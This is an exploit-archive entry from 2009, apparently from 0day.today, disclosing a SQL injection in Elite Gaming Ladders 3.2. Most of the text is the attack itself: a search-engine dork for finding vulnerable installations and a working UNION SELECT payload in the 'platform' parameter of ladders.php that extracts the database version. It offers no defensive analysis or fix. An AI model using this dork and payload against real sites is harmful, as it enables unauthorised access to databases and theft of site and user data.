id: 5776
date: 09/15/2009
title: Elite Gaming Ladders 3.2 (platform) SQL Injection Vulnerability
author: Snakespc
cves: 

===============================================================
Elite Gaming Ladders 3.2 (platform) SQL Injection Vulnerability
===============================================================


#--------------------------------------------------------
#Elite Gaming Ladders v3.2 Remote SQL Injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#-------------------------------------------------------
#
#Script:Elite Gaming Ladders v3.2
#
#http://eliteladders.com
#--------------------------------------------------------
#Dork:"Powered by: Elite Gaming Ladders v3.2"
#Exploit:
#--------
#Demo:http://eliteladders.com/demo/ladders.php?platform=-30+UNION%20SELECT%201,2,3,@@version,5,6,7--
----------------------------------------------------------



#  0day.today [2023-03-23]  #